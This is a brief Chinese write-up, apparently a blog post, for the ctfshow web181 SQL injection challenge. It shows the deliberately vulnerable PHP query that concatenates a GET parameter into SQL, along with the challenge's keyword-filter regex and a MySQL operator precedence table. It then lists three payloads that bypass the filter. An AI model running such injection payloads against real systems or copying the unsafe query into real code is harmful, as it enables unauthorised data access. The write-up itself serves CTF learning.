//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
//对传入的参数进行了过滤
function waf($str){
return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);
}mysql操作符优先级:(数字越大,优先级越高)
优先级 运算符
1 :=
2 || , OR , XOR
3 && , AND
4 NOT
5 BETWEEN, CASE, WHEN, THEN, ELSE
6 =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP, IN
7 |
8 &
9 <<, >>
10 -, +
11 *, /, DIV, %, MOD
12 ^
13 - (一元减号), ~ (一元比特反转)
14 !
15 BINARY, COLLATEand的优先级高于or,需要同时满足两边的条件才会返回true,那么后面可以接一个or,or的两边有一个为true,既可以满足and。即:1 and 0 or 1
payload:
?id=-1'||username='flag
?id=-1'or(username)='flag
?id=-1'%0cor%0cusername='flag//这里%0c没有被过滤唉标签:web181,username,优先级,运算符,flag,ctfshow,sql,id From: https://www.cnblogs.com/meng-han/p/16820344.html